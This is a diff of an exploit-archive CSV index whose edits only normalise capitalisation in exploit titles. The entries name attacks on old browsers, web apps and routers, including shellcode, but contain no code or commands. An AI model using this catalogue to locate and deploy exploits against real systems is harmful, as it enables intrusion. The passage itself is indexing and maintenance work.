24262,platforms/windows/remote/24262.html,"Opera Web Browser 7.5x - IFrame OnLoad Address Bar URL Obfuscation",2004-07-08,"bitlance winter",windows,remote,0 24263,platforms/windows/remote/24263.txt,"Mozilla 1.7 - External Protocol Handler",2004-07-08,"Keith McCanless",windows,remote,0 24264,platforms/multiple/remote/24264.java,"Sun Java Virtual Machine 1.x - Font.createFont Method Insecure Temporary File Creation",2004-07-09,Jelmer,multiple,remote,0 24265,platforms/windows/remote/24265.html,"Microsoft Internet Explorer 5.0.1 - JavaScript Method Assignment Cross-Domain Scripting",2004-07-12,Paul,windows,remote,0 24266,platforms/windows/remote/24266.txt,"Microsoft Internet Explorer 5.0.1 - Popup.show Mouse Event Hijacking",2004-07-12,Paul,windows,remote,0 -24267,platforms/windows/dos/24267.txt,"Microsoft Internet Explorer 6.0 - JavaScript Null Pointer Exception Denial of Service",2004-07-12,"Berend-Jan Wever",windows,dos,0 +24267,platforms/windows/dos/24267.txt,"Microsoft Internet Explorer 6 - JavaScript Null Pointer Exception Denial of Service",2004-07-12,"Berend-Jan Wever",windows,dos,0 24268,platforms/multiple/remote/24268.txt,"Code-Crafters Ability Mail Server 1.18 - errormsg Parameter Cross-Site Scripting",2004-07-12,dr_insane,multiple,remote,0 -24269,platforms/php/webapps/24269.txt,"NConf 1.3 - (detail.php detail_admin_items.php id parameter) SQL Injection",2013-01-21,haidao,php,webapps,0 +24269,platforms/php/webapps/24269.txt,"NConf 1.3 - (detail.php detail_admin_items.php id Parameter) SQL Injection",2013-01-21,haidao,php,webapps,0 24270,platforms/php/webapps/24270.txt,"NConf 1.3 - Arbitrary File Creation",2013-01-21,haidao,php,webapps,0 24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - Blog_Exec.php Cross-Site Scripting",2004-08-07,"befcake beefy",php,webapps,0 24272,platforms/multiple/remote/24272.rb,"Jenkins - Script-Console Java Execution",2013-01-21,Metasploit,multiple,remote,0 @@ -21474,14 +21475,14 @@ id,file,description,date,author,platform,type,port 24285,platforms/cgi/webapps/24285.txt,"Gattaca Server 2003 - Language Variable Path Exposure",2004-07-15,dr_insane,cgi,webapps,0 24286,platforms/cgi/webapps/24286.txt,"Gattaca Server 2003 - Cross-Site Scripting",2004-07-15,dr_insane,cgi,webapps,0 24287,platforms/cgi/webapps/24287.txt,"BoardPower Forum - ICQ.cgi Cross-Site Scripting",2004-07-15,"Alexander Antipov",cgi,webapps,0 -24288,platforms/windows/dos/24288.txt,"Symantec Norton Antivirus 2001/2002/2003/2004 - Script Blocker Denial of Service",2004-07-16,vozzie,windows,dos,0 +24288,platforms/windows/dos/24288.txt,"Symantec Norton AntiVirus 2001/2002/2003/2004 - Script Blocker Denial of Service",2004-07-16,vozzie,windows,dos,0 24289,platforms/php/webapps/24289.c,"Artmedic Webdesign Kleinanzeigen Script - File Include",2004-07-19,"Adam Simuntis",php,webapps,0 24290,platforms/php/webapps/24290.txt,"CuteNews 1.3 - Comment HTML Injection",2004-07-19,DarkBicho,php,webapps,0 24291,platforms/php/webapps/24291.txt,"Outblaze Webmail - HTML Injection",2004-07-19,DarkBicho,php,webapps,0 24292,platforms/php/webapps/24292.txt,"Adam Ismay Print Topic Mod 1.0 - SQL Injection",2004-07-19,"Bartek Nowotarski",php,webapps,0 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0 -24294,platforms/php/webapps/24294.txt,"Wordpress Developer Formatter Plugin - Cross-Site Request Forgery",2013-01-22,"Junaid Hussain",php,webapps,0 -24295,platforms/php/webapps/24295.txt,"Adult Webmaster Script - Password Disclosure",2013-01-22,"Dshellnoi Unix",php,webapps,0 +24294,platforms/php/webapps/24294.txt,"WordPress Developer Formatter Plugin - Cross-Site Request Forgery",2013-01-22,"Junaid Hussain",php,webapps,0 +24295,platforms/php/webapps/24295.txt,"Adult WebMaster Script - Password Disclosure",2013-01-22,"Dshellnoi Unix",php,webapps,0 24356,platforms/php/webapps/24356.txt,"Moodle 1.x - 'post.php' Cross-Site Scripting",2004-08-16,"Javier Ubilla",php,webapps,0 24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - Common.php Remote File Inclusion",2004-07-20,"Radek Hulan",php,webapps,0 24297,platforms/windows/remote/24297.pl,"Serena TeamTrack 6.1.1 - Remote Authentication Bypass",2004-07-21,"Noam Rathaus",windows,remote,0 @@ -21502,7 +21503,7 @@ id,file,description,date,author,platform,type,port 24312,platforms/linux/remote/24312.html,"Mozilla Browser 0.8/0.9/1.x - Refresh Security Property Spoofing",2004-07-26,E.Kellinis,linux,remote,0 24313,platforms/asp/webapps/24313.txt,"XLineSoft ASPRunner 1.0/2.x - [TABLE-NAME]_search.asp Typeen Parameter Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 24314,platforms/asp/webapps/24314.txt,"XLineSoft ASPRunner 1.0/2.x - [TABLE-NAME]_edit.asp SQL Parameter Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 -24315,platforms/asp/webapps/24315.txt,"XLineSoft ASPRunner 1.0/2.x - [TABLE]_list.asp SearchFor Parameter Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 +24315,platforms/asp/webapps/24315.txt,"XLineSoft ASPRunner 1.0/2.x - [TABLE]_list.asp searchFor Parameter Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 24316,platforms/asp/webapps/24316.txt,"XLineSoft ASPRunner 1.0/2.x - export.asp SQL Parameter Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 24317,platforms/asp/webapps/24317.txt,"XLineSoft ASPRunner 1.0/2.x - Database Direct Request Information Disclosure",2004-07-26,"Ferruh Mavituna",asp,webapps,0 24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0 @@ -21528,7 +21529,7 @@ id,file,description,date,author,platform,type,port 24338,platforms/linux/remote/24338.c,"Citadel/UX 5.9/6.x - Username Buffer Overflow (1)",2004-07-30,CoKi,linux,remote,0 24339,platforms/linux/remote/24339.c,"Citadel/UX 5.9/6.x - Username Buffer Overflow (2)",2004-07-30,Nebunu,linux,remote,0 24340,platforms/php/webapps/24340.txt,"PowerPortal 1.1/1.3 - Private Message HTML Injection",2004-07-30,vampz,php,webapps,0 -24341,platforms/php/webapps/24341.txt,"FusionPHP Fusion News 3.3/3.6 - Administrator Command Execution",2004-07-30,"Joseph Moniz",php,webapps,0 +24341,platforms/php/webapps/24341.txt,"Fusionphp Fusion News 3.3/3.6 - Administrator Command Execution",2004-07-30,"Joseph Moniz",php,webapps,0 24342,platforms/cgi/remote/24342.txt,"Webcam Corp Webcam Watchdog 4.0.1 - sresult.exe Cross-Site Scripting",2004-08-02,dr_insane,cgi,remote,0 24343,platforms/windows/dos/24343.txt,"MailEnable 1.1x - Content-Length Denial of Service",2004-07-30,CoolICE,windows,dos,0 24344,platforms/hardware/dos/24344.txt,"U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service",2004-08-02,"Albert Puigsech Galicia",hardware,dos,0 @@ -21541,17 +21542,17 @@ id,file,description,date,author,platform,type,port 24351,platforms/multiple/dos/24351.c,"Free Web Chat Initial Release - UserManager.java Null Pointer Denial of Service",2004-08-04,"Donato Ferrante",multiple,dos,0 24352,platforms/multiple/dos/24352.java,"Free Web Chat Initial Release - Connection Saturation Denial of Service",2004-08-04,"Donato Ferrante",multiple,dos,0 24353,platforms/unix/remote/24353.sql,"Oracle 9i - Multiple Unspecified Vulnerabilities",2004-08-04,"Marco Ivaldi",unix,remote,0 -24354,platforms/windows/remote/24354.txt,"Microsoft Internet Explorer 6.0 - mms Protocol Handler Executable Command Line Injection",2004-08-05,"Nicolas Robillard",windows,remote,0 +24354,platforms/windows/remote/24354.txt,"Microsoft Internet Explorer 6 - mms Protocol Handler Executable Command Line Injection",2004-08-05,"Nicolas Robillard",windows,remote,0 24355,platforms/linux/dos/24355.txt,"GNU Info 4.7 - Follow XRef Buffer Overrun",2004-08-06,"Josh Martin",linux,dos,0 24358,platforms/linux/dos/24358.txt,"Xine-Lib 0.99 - Remote Buffer Overflow",2004-07-08,c0ntex,linux,dos,0 24359,platforms/php/webapps/24359.php,"YaPiG 0.92 - Remote Server-Side Script Execution",2004-07-07,aCiDBiTS,php,webapps,0 24360,platforms/linux/dos/24360.py,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (1)",2004-08-09,"Juan Pablo Martinez Kuhn",linux,dos,0 24361,platforms/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (2)",2004-08-09,jsk,linux,remote,0 24362,platforms/windows/dos/24362.txt,"Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun",2004-08-11,"Paul Craig",windows,dos,0 -24363,platforms/windows/remote/24363.txt,"clearswift mimesweeper for Web 4.0/5.0 - Directory Traversal",2004-07-11,"Kroma Pierre",windows,remote,0 -24364,platforms/php/webapps/24364.txt,"Wordpress SolveMedia 1.1.0 Plugin - Cross-Site Request Forgery",2013-01-25,"Junaid Hussain",php,webapps,0 +24363,platforms/windows/remote/24363.txt,"clearswift MIMEsweeper for Web 4.0/5.0 - Directory Traversal",2004-07-11,"Kroma Pierre",windows,remote,0 +24364,platforms/php/webapps/24364.txt,"WordPress SolveMedia 1.1.0 Plugin - Cross-Site Request Forgery",2013-01-25,"Junaid Hussain",php,webapps,0 24365,platforms/php/webapps/24365.txt,"ImageCMS 4.0.0b - Multiple Vulnerabilities",2013-01-25,"High-Tech Bridge SA",php,webapps,0 -24366,platforms/windows/local/24366.rb,"Windows - Manage Memory Payload Injection",2013-01-25,Metasploit,windows,local,0 +24366,platforms/windows/local/24366.rb,"Microsoft Windows - Manage Memory Payload Injection",2013-01-25,Metasploit,windows,local,0 24367,platforms/php/webapps/24367.txt,"IceWarp Web Mail 3.3.2/5.2.7 - Multiple Remote Input Validation Vulnerabilities",2004-08-11,ShineShadow,php,webapps,0 24368,platforms/asp/webapps/24368.txt,"MapInfo Discovery 1.0/1.1 - Remote Log File Access Information Disclosure",2004-07-15,anonymous,asp,webapps,0 24369,platforms/asp/webapps/24369.txt,"MapInfo Discovery 1.0/1.1 - MapFrame.asp mapname Parameter Cross-Site Scripting",2004-07-15,anonymous,asp,webapps,0 @@ -21592,7 +21593,7 @@ id,file,description,date,author,platform,type,port 24404,platforms/windows/remote/24404.txt,"Gadu-Gadu 6.0 - File Download Filename Obfuscation",2004-08-23,"Bartosz Kwitkowski",windows,remote,0 24405,platforms/php/webapps/24405.txt,"SWsoft Plesk Reloaded 7.1 - Login_name Parameter Cross-Site Scripting",2004-08-24,sourvivor,php,webapps,0 24406,platforms/linux/local/24406.txt,"GNU a2ps 4.13 - File Name Command Execution",2004-08-24,"Rudolf Polzer",linux,local,0 -24407,platforms/windows/remote/24407.txt,"Microsoft Internet Explorer 6.0 - Resource Detection",2004-08-24,"GreyMagic Software",windows,remote,0 +24407,platforms/windows/remote/24407.txt,"Microsoft Internet Explorer 6 - Resource Detection",2004-08-24,"GreyMagic Software",windows,remote,0 24408,platforms/cgi/webapps/24408.txt,"Web-APP.Org WebAPP 0.8/0.9.x - Directory Traversal",2004-08-24,"Jerome Athias",cgi,webapps,0 24409,platforms/windows/remote/24409.txt,"Working Resources BadBlue 1.7.x/2.x - Unauthorized Proxy Relay",2002-12-11,Texonet,windows,remote,0 24410,platforms/php/webapps/24410.txt,"PHP Code Snippet Library 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-24,"Nikyt0x Argentina",php,webapps,0 @@ -21614,7 +21615,7 @@ id,file,description,date,author,platform,type,port 24426,platforms/windows/dos/24426.html,"Opera Web Browser 7.23 - Empty Embedded Object JavaScript Denial of Service",2004-09-01,Stevo,windows,dos,0 24432,platforms/windows/webapps/24432.txt,"Microsoft Internet Explorer 8 / 9 - Steal Any Cookie",2013-01-28,"Christian Haider",windows,webapps,0 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 -24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php L parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php L Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 24433,platforms/php/webapps/24433.txt,"PHP weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails - JSON Processor YAML Deserialization Code Execution",2013-01-29,Metasploit,multiple,remote,0 @@ -21626,12 +21627,12 @@ id,file,description,date,author,platform,type,port 24442,platforms/hardware/webapps/24442.txt,"D-Link DCS Cameras - Multiple Vulnerabilities",2013-01-31,"Roberto Paleari",hardware,webapps,0 24443,platforms/hardware/webapps/24443.txt,"Buffalo TeraStation TS-Series - Multiple Vulnerabilities",2013-01-31,"Andrea Fabrizi",hardware,webapps,0 24444,platforms/php/remote/24444.rb,"DataLife Engine - preview.php PHP Code Injection",2013-02-01,Metasploit,php,remote,0 -24445,platforms/php/webapps/24445.txt,"Simple Machine Forum 2.0.x < 2.0.4 - File Disclosure/Path Traversal",2013-02-04,NightlyDev,php,webapps,0 +24445,platforms/php/webapps/24445.txt,"Simple Machine Forum 2.0.x < 2.0.4 - File Disclosure / Directory Traversal",2013-02-04,NightlyDev,php,webapps,0 24448,platforms/windows/dos/24448.svg,"Opera SVG - Use-After-Free",2013-02-05,Cons0ul,windows,dos,0 24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0 24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 ftpd - Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0 24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0 -24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - (config.php question parameter) SQL Injection",2013-02-05,kallimero,php,webapps,0 +24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - (config.php question Parameter) SQL Injection",2013-02-05,kallimero,php,webapps,0 24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 and DIR-300 (rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0 24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK - unique_service_name() Remote Code Execution",2013-02-05,Metasploit,unix,remote,0 @@ -21647,8 +21648,8 @@ id,file,description,date,author,platform,type,port 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit (Metasploit)",2013-02-07,"Craig Freyman",windows,remote,0 24468,platforms/windows/dos/24468.pl,"KMPlayer - Denial of Service",2013-02-10,Jigsaw,windows,dos,0 -24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php id parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 -24511,platforms/windows/dos/24511.txt,"SAP Netweaver Message Server - Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0 +24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php id Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24511,platforms/windows/dos/24511.txt,"SAP NetWeaver Message Server - Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0 24472,platforms/php/webapps/24472.txt,"Easy Live Shop System - SQL Injection",2013-02-10,"Ramdan Yantu",php,webapps,0 24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24474,platforms/windows/dos/24474.py,"Schneider Electric Accutech Manager - Heap Overflow (PoC)",2013-02-10,"Evren Yalçın",windows,dos,0 @@ -21656,17 +21657,17 @@ id,file,description,date,author,platform,type,port 24476,platforms/hardware/webapps/24476.txt,"Linksys WAG200G - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 -24479,platforms/windows/remote/24479.py,"FreeFloat FTP 1.0 - Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0 -24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Post-Authenticated) Remote Command Execution",2013-02-11,aeon,php,webapps,0 +24479,platforms/windows/remote/24479.py,"Freefloat FTP 1.0 - Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0 +24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Post-Authentication) Remote Command Execution",2013-02-11,aeon,php,webapps,0 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0 24483,platforms/hardware/webapps/24483.txt,"TP-Link Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0 -24485,platforms/windows/dos/24485.txt,"Windows - HWND_BROADCAST PoC (MS13-005)",2013-02-11,0vercl0k,windows,dos,0 +24485,platforms/windows/dos/24485.txt,"Microsoft Windows - HWND_BROADCAST PoC (MS13-005)",2013-02-11,0vercl0k,windows,dos,0 24486,platforms/multiple/dos/24486.txt,"Google Chrome - Silent HTTP Authentication",2013-02-11,T355,multiple,dos,0 24487,platforms/linux/dos/24487.py,"cURL - Buffer Overflow",2013-02-11,Volema,linux,dos,0 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - (install.php) Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 -24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php id parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 -24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client - gwcls1.dll ActiveX Remote Code Execution",2013-02-12,Metasploit,windows,remote,0 +24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php id Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24490,platforms/windows/remote/24490.rb,"Novell Groupwise Client - gwcls1.dll ActiveX Remote Code Execution",2013-02-12,Metasploit,windows,remote,0 24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authorization Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - (ofc_upload_image.php) Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)",2013-02-14,"Scott Bell",windows,remote,0 @@ -21675,17 +21676,17 @@ id,file,description,date,author,platform,type,port 24498,platforms/hardware/webapps/24498.txt,"OpenPLI 3.0 Beta (OpenPLi-beta-dm7000-20130127-272) - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps,0 24499,platforms/hardware/webapps/24499.txt,"Raidsonic IB-NAS5220 and IB-NAS4220-B - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps,0 24500,platforms/windows/webapps/24500.txt,"SonicWALL OEM Scrutinizer 9.5.2 - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,windows,webapps,0 -24501,platforms/php/webapps/24501.txt,"Ultra Light Forum - Persistant Cross-Site Scripting",2013-02-14,"cr4wl3r ",php,webapps,0 +24501,platforms/php/webapps/24501.txt,"Ultra Light Forum - Persistent Cross-Site Scripting",2013-02-14,"cr4wl3r ",php,webapps,0 24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow",2013-02-14,Metasploit,windows,remote,0 24504,platforms/hardware/webapps/24504.txt,"TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption Exploit",2013-02-15,"Julien Ahrens",windows,local,0 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0 24507,platforms/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps,0 -24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php id parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php id Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 24513,platforms/hardware/webapps/24513.txt,"Netgear DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,hardware,webapps,0 24514,platforms/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,php,webapps,0 24515,platforms/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,php,webapps,0 -24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php cid parameter' SQL Injection",2013-02-18,"Easy Laster",php,webapps,0 +24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php cid Parameter' SQL Injection",2013-02-18,"Easy Laster",php,webapps,0 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0 @@ -21699,20 +21700,20 @@ id,file,description,date,author,platform,type,port 24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0 -24537,platforms/php/webapps/24537.txt,"PHPMyRecipes 1.2.2 - (viewrecipe.php r_id parameter) SQL Injection",2013-02-21,"cr4wl3r ",php,webapps,0 +24537,platforms/php/webapps/24537.txt,"PHPMyRecipes 1.2.2 - (viewrecipe.php r_id Parameter) SQL Injection",2013-02-21,"cr4wl3r ",php,webapps,0 24539,platforms/multiple/remote/24539.rb,"Java Applet JMX - Remote Code Execution (2)",2013-02-25,Metasploit,multiple,remote,0 24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection",2013-02-26,"cr4wl3r ",php,webapps,0 24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection",2013-02-26,L0n3ly-H34rT,php,webapps,0 24543,platforms/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,ios,webapps,0 -24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 - (edit_photos.php title parameter) Cross-Site Scripting",2013-02-26,LiquidWorm,php,webapps,0 -24545,platforms/php/webapps/24545.txt,"MTP GuestBook 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 +24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 - (edit_photos.php title Parameter) Cross-Site Scripting",2013-02-26,LiquidWorm,php,webapps,0 +24545,platforms/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0 24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 & 1.8.12 - Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0 24549,platforms/php/remote/24549.rb,"PolarPearCMS - PHP File Upload",2013-02-26,Metasploit,php,remote,0 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0 24551,platforms/php/webapps/24551.txt,"Joomla! 3.0.2 - (highlight.php) PHP Object Injection",2013-02-27,EgiX,php,webapps,0 -24552,platforms/php/webapps/24552.txt,"Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0 +24552,platforms/php/webapps/24552.txt,"WordPress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0 24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0 24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 - '.m3u' Buffer Overflow",2013-03-01,metacom,windows,dos,0 24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 - LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0 @@ -21733,7 +21734,7 @@ id,file,description,date,author,platform,type,port 24574,platforms/cgi/webapps/24574.txt,"Webmin 1.x - HTML Email Command Execution",2004-09-07,"Keigo Yamazaki",cgi,webapps,0 24575,platforms/php/webapps/24575.txt,"PSNews 1.1 - No Parameter Cross-Site Scripting",2004-09-05,"Michal Blaszczak",php,webapps,0 24576,platforms/cgi/webapps/24576.txt,"UtilMind Solutions Site News 1.1 - Authentication Bypass",2004-09-07,anonymous,cgi,webapps,0 -24720,platforms/windows/remote/24720.txt,"Microsoft Internet Explorer 6.0 - IFRAME Status Bar URI Obfuscation",2004-11-02,"Benjamin Tobias Franz",windows,remote,0 +24720,platforms/windows/remote/24720.txt,"Microsoft Internet Explorer 6 - IFRAME Status Bar URI Obfuscation",2004-11-02,"Benjamin Tobias Franz",windows,remote,0 24631,platforms/asp/webapps/24631.txt,"PD9 Software MegaBBS 2.0/2.1 - thread-post.asp Multiple Header CRLF Injection",2004-09-27,pigrelax,asp,webapps,0 24632,platforms/asp/webapps/24632.txt,"PD9 Software MegaBBS 2.0/2.1 - ladder-log.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24633,platforms/asp/webapps/24633.txt,"PD9 Software MegaBBS 2.0/2.1 - view-profile.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 @@ -21773,7 +21774,7 @@ id,file,description,date,author,platform,type,port 24610,platforms/multiple/dos/24610.txt,"DNS4Me 3.0 - Denial of Service / Cross-Site Scripting",2004-09-17,"James Bercegay",multiple,dos,0 24611,platforms/cgi/webapps/24611.txt,"YaBB 1.x/9.1.2000 - Administrator Command Execution",2004-09-17,"GulfTech Security",cgi,webapps,0 24612,platforms/cgi/webapps/24612.txt,"YaBB 1.x/9.1.2000 - YaBB.pl IMSend Cross-Site Scripting",2004-09-17,"GulfTech Security",cgi,webapps,0 -24613,platforms/php/webapps/24613.txt,"ReMOSitory - SQL Injection",2004-09-18,khoaimi,php,webapps,0 +24613,platforms/php/webapps/24613.txt,"Remository - SQL Injection",2004-09-18,khoaimi,php,webapps,0 24614,platforms/php/webapps/24614.txt,"Mambo Open Source 4.5.1 (1.0.9) - Cross-Site Scripting",2004-09-20,"Joxean Koret",php,webapps,0 24615,platforms/php/webapps/24615.txt,"Mambo Open Source 4.5.1 (1.0.9) - Function.php Arbitrary Command Execution",2004-09-20,"Joxean Koret",php,webapps,0 24616,platforms/php/webapps/24616.txt,"TUTOS - file_overview.php link_id Parameter SQL Injection",2004-09-20,"Joxean Koret",php,webapps,0 @@ -21793,15 +21794,15 @@ id,file,description,date,author,platform,type,port 24635,platforms/windows/dos/24635.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (2)",2004-09-27,Coolio,windows,dos,0 24636,platforms/windows/dos/24636.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (3)",2004-09-27,"Ken Hollis",windows,dos,0 24637,platforms/windows/dos/24637.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial 